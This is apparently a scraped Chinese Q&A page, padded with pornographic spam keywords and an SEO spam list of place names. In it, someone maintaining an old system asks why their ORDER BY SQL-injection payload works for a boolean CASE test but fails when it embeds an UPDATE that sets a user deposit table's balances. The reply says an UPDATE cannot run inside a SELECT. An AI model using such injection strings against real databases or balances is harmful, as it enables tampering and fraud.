久久r热视频,国产午夜精品一区二区三区视频,亚洲精品自拍偷拍,欧美日韩精品二区

您的位置:首頁技術文章
文章詳情頁

mysql - sql報錯原因?

瀏覽:105日期:2022-06-13 10:08:51

問題描述

發現一個正在維護的老系統的基于orderBy的sql注入漏洞,準備驗證一下,

我先執行這個sql注入,是可以的

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(select depositfrom sysuser_user_deposit)end)=1 ASC LIMIT 20 OFFSET 0

但是當我執行這個帶update語句的sql時報錯了:

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(updatesysuser_user_depositsetdeposit=11)end)=1 ASC LIMIT 20 OFFSET 0

報錯

<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’update<br>sysuser_user_deposit<br>set<br>deposit=11)end)=1 ASC LIMIT 20 OFFSET 0’ at line 9</code>

我應該如何讓他執行update?

問題解答

回答1:

主體是select的時候,里面是不能update的,否則執行不了的,mybatis這種注入我試過,<select>里執行update直接報錯,注入不了

相關文章:
主站蜘蛛池模板: 迁西县| 泾川县| 开阳县| 庆阳市| 库尔勒市| 勐海县| 黎平县| 双柏县| 平湖市| 伊金霍洛旗| 垫江县| 宁国市| 肥乡县| 资阳市| 佳木斯市| 城固县| 梅河口市| 南充市| 金湖县| 佛坪县| 佛学| 凤庆县| 阿克陶县| 长治县| 浦城县| 雷州市| 金溪县| 宝丰县| 城口县| 衡阳市| 龙州县| 始兴县| 南雄市| 龙口市| 高碑店市| 新巴尔虎右旗| 湄潭县| 铅山县| 潼关县| 即墨市| 类乌齐县|